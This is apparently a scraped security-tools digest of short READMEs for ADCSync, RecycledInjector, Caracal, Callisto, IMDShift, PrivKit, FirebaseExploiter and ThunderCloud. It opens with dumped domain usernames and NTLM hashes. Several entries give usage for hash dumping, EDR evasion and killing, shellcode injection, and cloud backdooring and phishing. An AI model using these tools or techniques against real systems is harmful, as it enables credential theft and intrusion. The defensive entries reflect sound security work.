    100%|โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
    THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
    THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
    THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
    THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
    THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
    THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
    THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
    THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
    THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

    Introduction

    ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

    Installation

    git clone https://github.com/JPG0mez/adcsync.git
    cd adcsync
    pip3 install -r requirements.txt

    Usage

    To use this tool we need the following things:

    1. Valid Domain Credentials
    2. A user list from a bloodhound dump that will be passed in.
    3. A template vulnerable to ESC1 (Found with Certipy find)
    # python3 adcsync.py --help
    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Usage: adcsync.py [OPTIONS]

    Options:
    -f, --file TEXT Input User List JSON file from Bloodhound [required]
    -o, --output TEXT NTLM Hash Output file [required]
    -ca TEXT Certificate Authority [required]
    -dc-ip TEXT IP Address of Domain Controller [required]
    -u, --user TEXT Username [required]
    -p, --password TEXT Password [required]
    -template TEXT Template Name vulnerable to ESC1 [required]
    -target-ip TEXT IP Address of th e target machine [required]
    --help Show this message and exit.

    TODO

    • Support alternative authentication methods such as NTLM hashes and ccache files
    • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
    • Add jitter and sleep options to avoid detection
    • Add type validation for all variables

    Acknowledgements

    • puzzlepeaches: Telling me to hurry up and write this
    • ly4k: For Certipy
    • WazeHell: For the script to set up the vulnerable AD environment used for testing


    RecycledInjector - Native Syscalls Shellcode Injector

    By: Zion3R


    (Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

    To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

    Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).


    Usage

    .\RecycledInjector.exe <path_to_shellcode_file>

    Proof of Concept

    This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

    On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



    Caracal - Static Analyzer For Starknet Smart Contracts

    By: Zion3R


    Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts.

    Features

    • Detectors to detect vulnerable Cairo code
    • Printers to report information
    • Taint analysis
    • Data flow analysis framework
    • Easy to run in Scarb projects

    Installation

    Precompiled binaries

    Precompiled binaries are available on our releases page. If you are using Cairo compiler 1.x.x uses the binary v0.1.x otherwise if you are using the Cairo compiler 2.x.x uses v0.2.x.

    Building from source

    You need the Rust compiler and Cargo. Building from git:

    cargo install --git https://github.com/crytic/caracal --profile release --force

    Building from a local copy:

    git clone https://github.com/crytic/caracal
    cd caracal
    cargo install --path . --profile release --force

    Usage

    List detectors:

    caracal detectors

    List printers:

    caracal printers

    Standalone

    To use with a standalone cairo file you need to pass the path to the corelib library either with the --corelib cli option or by setting the CORELIB_PATH environment variable. Run detectors:

    caracal detect path/file/to/analyze --corelib path/to/corelib/src

    Run printers:

    caracal print path/file/to/analyze --printer printer_to_use --corelib path/to/corelib/src

    Scarb

    If you have a project that uses Scarb you need to add the following in Scarb.toml:

    [[target.starknet-contract]]
    sierra = true

    [cairo]
    sierra-replace-ids = true

    Then pass the path to the directory where Scarb.toml resides. Run detectors:

    caracal detect path/to/dir

    Run printers:

    caracal print path/to/dir --printer printer_to_use

    Detectors

    Num Detector What it Detects Impact Confidence Cairo
    1 controlled-library-call Library calls with a user controlled class hash High Medium 1 & 2
    2 unchecked-l1-handler-from Detect L1 handlers without from address check High Medium 1 & 2
    3 felt252-overflow Detect user controlled operations with felt252 type, which is not overflow safe High Medium 1 & 2
    4 reentrancy Detect when a storage variable is read before an external call and written after Medium Medium 1 & 2
    5 read-only-reentrancy Detect when a view function read a storage variable written after an external call Medium Medium 1 & 2
    6 unused-events Events defined but not emitted Medium Medium 1 & 2
    7 unused-return Unused return values Medium Medium 1 & 2
    8 unenforced-view Function has view decorator but modifies state Medium Medium 1
    9 unused-arguments Unused arguments Low Medium 1 & 2
    10 reentrancy-benign Detect when a storage variable is written after an external call but not read before Low Medium 1 & 2
    11 reentrancy-events Detect when an event is emitted after an external call leading to out-of-order events Low Medium 1 & 2
    12 dead-code Private functions never used Low Medium 1 & 2

    The Cairo column represent the compiler version(s) for which the detector is valid.

    Printers

    • cfg: Export the CFG of each function to a .dot file
    • callgraph: Export function call graph to a .dot file

    How to contribute

    Check the wiki on the following topics:

    Limitations

    • Inlined functions are not handled correctly.
    • Since it's working over the SIERRA representation it's not possible to report where an error is in the source code but we can only report SIERRA instructions/what's available in a SIERRA program.


    Callisto - An Intelligent Binary Vulnerability Analysis Tool

    By: Zion3R


    Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the psuedo code output looking for potential security vulnerabilities in that pseudo c code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


    This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

    For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.

    I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

    Requirements:

    • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
    • Ghidra
    • Semgrep - pip install semgrep
    • requirements.txt - pip install -r requirements.txt
    • Ensure the correct path to your Ghidra directory is set in the config.txt file

    To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

    • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
    • -o => define an output file, if you want to save the output
    • -ai and -o are optional parameters
    • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
    • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
    • Ex. (Running all functions through AI Analysis):
      python callisto.py -b vulnProgram.exe -ai -all -o results.txt

    Program Output Example:



    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R


    AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration process of all workloads to IMDSv2 with extensive capabilities, which implements enhanced security measures to protect against these attacks.


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
    • Automated migration of all workloads to IMDSv2
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

    • IMDShift allows migration of standalone services and not all EC2 instances, blindly. For example, the user can choose to only migrate EKS workloads, also some services such as Lightsail, do not fall under EC2 umbrella, IMDShift has the capability to migrate such resources as well.
    • IMDShift allows standalone enabling of metadata endpoint for resources it is currently disabled, without having to perform migration on the remaining resources
    • IMDShift allows standalone update response hop limit for resources where metadata endpoint is enabled, without having to perform migration on the remaining resources
    • IMDShift allows, not only the option to include specific regions, but also skip specified regions
    • IMDShift not only allows usage of AWS profiles, but also can assume roles, to work
    • IMDShift helps with post-migration activities, by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
    --services TEXT This flag specifies services scan for IMDSv1
    usage from [EC2, Sagemaker, ASG (Auto Scaling
    Groups), Lightsail, ECS, EKS, Beanstalk].
    Format: "--services EC2,Sagemaker,ASG"
    --include-regions TEXT This flag specifies regions explicitly to
    include scan for IMDSv1 usage. Format: "--
    include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
    -- update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
    --role-arn TEXT This flag let's you assume a role via aws sts.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.


    PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

    By: Zion3R


    PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


    PrivKit detects following misconfigurations

     Checks for Unquoted Service Paths
    Checks for Autologon Registry Keys
    Checks for Always Install Elevated Registry Keys
    Checks for Modifiable Autoruns
    Checks for Hijackable Paths
    Enumerates Credentials From Credential Manager
    Looks for current Token Privileges

    Usage

    [03/20 00:51:06] beacon> privcheck
    [03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
    [03/20 00:51:06] [*] Checking For Unquoted Service Paths..
    [03/20 00:51:06] [*] Checking For Autologon Registry Keys..
    [03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
    [03/20 00:51:06] [*] Checking For Modifiable Autoruns..
    [03/20 00:51:06] [*] Checking For Hijackable Paths..
    [03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
    [03/20 00:51:06] [*] Checking For Token Privileges..
    [03/20 00:51:06] [+] host called home, sent: 10485 bytes
    [03/20 00:51:06] [+] received output:
    Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

    Simply load the cna file and type "privcheck"
    If you want to compile by yourself you can use:
    make all
    or
    x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

    If you want to look for just one misconf you can use object file with "inline-execute" for example
    inline-execute /path/tokenprivileges.o

    Acknowledgement

    Mr.Un1K0d3r - Offensive Coding Portal
    https://mr.un1k0d3r.world/portal/

    Outflank - C2-Tool-Collection
    https://github.com/outflanknl/C2-Tool-Collection

    dtmsecurity - Beacon Object File (BOF) Creation Helper
    https://github.com/dtmsecurity/bof_helper

    Microsoft :)
    https://learn.microsoft.com/en-us/windows/win32/api/

    HsTechDocs by HelpSystems(Fortra)
    https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm



    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


    FirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    This will display help for the CLI tool. Here are all the required arguments it supports.

    Installation

    FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    To scan a specific domain to check for Insecure Firebase DB.

    To exploit a Firebase DB to write your own JSON document in it.

    Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

    Checking the exploited URL to verify the vulnerability.

    Adding custom path for exploiting Firebase DBs.

    Mass scanning for Insecure Firebase Databases from list of target hosts.

    Exploiting vulnerable Firebase DBs from the list of target hosts.

    License

    FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


    ThunderCloud - Cloud Exploit Framework


    Cloud Exploit Framework


    Usage

    python3 tc.py -h

    _______ _ _ _____ _ _
    |__ __| | | | / ____| | | |
    | | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
    | | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
    | | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
    \_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


    usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
    [-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

    Attack modules of cloud AWS

    optional arguments:
    -h, --help show this help message and exit
    -ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
    to verify if cognito endpoint is vulnerable and to extract credentials
    -reg REGION, --region REGION
    AWS region of the resource
    -accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
    AWS account of the victim
    -aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
    AWS access keys of the victim account
    -aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
    AWS secret key of the victim account
    -bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
    Name of the backdoor role in victim role
    -sso SSO_URL, --sso_url SSO_URL
    AWS SSO URL to phish for AWS credentials
    -enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
    To enumerate and assume account roles in victim AWS roles
    -s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
    Execute upload attack on S3 bucket
    -conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
    Azure Shared Access key for readingservicebus/queues/blobs etc
    -blob BLOB, --blob BLOB
    Azure blob enumeration
    -shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
    Azure shared key

    Requirements

    * python 3
    * pip
    * git

    Installation

     - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`   
    - install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
    - create a python 3.6 local enviroment `virtualenv -p python3.6 venv`
    - activate the virtual enviroment `source venv/bin/activate`
    - install project dependencies `pip install -r requirements.txt`
    - run the tool via `python tc.py --help`

    Running ThunderCloud

    Examples

    python3 tc.py -sso <sso_url> --region <region>
    python3 tc.py -ce <cognito_endpoint> --region <region>


    โŒ